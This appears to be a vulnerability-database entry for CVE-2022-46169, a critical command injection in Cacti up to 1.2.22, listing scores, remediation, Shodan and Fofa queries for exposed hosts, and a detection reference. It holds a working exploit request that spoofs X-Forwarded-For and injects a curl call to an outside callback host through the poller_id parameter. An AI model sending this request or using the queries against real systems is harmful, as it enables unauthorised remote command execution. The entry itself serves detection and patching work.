🔙 목록으로 돌아가기

CVE-2022-46169: Cacti <=1.2.22 - Remote Command Injection

TitleCacti <=1.2.22 - Remote Command Injection
AuthorHardik-Solanki,j4vaovo
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
RemediationUpgrade Cacti to version 1.2.23 or later to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94468
CVE IDCVE-2022-46169
CWE IDCWE-78,CWE-74
Shodan Querytitle:"Login to Cacti"http.title:"login to cacti"http.title:"cacti"http.favicon.hash:"-1797138069"
Fofa Queryicon_hash="-1797138069"title="cacti"title="login to cacti"
Tags cve cve2022 auth-bypass cacti kev rce unauth vkev vuln

🔍 Vulnerability Description

Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20d5jn1dhle0o40e21ofq083qqksxmaynwz.oast.live%20-H%20'User-Agent%3a%20KOGe9d'; HTTP/1.1
Host: www.victim.com
X-Forwarded-For: 127.0.0.1

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-46169.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-46169.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A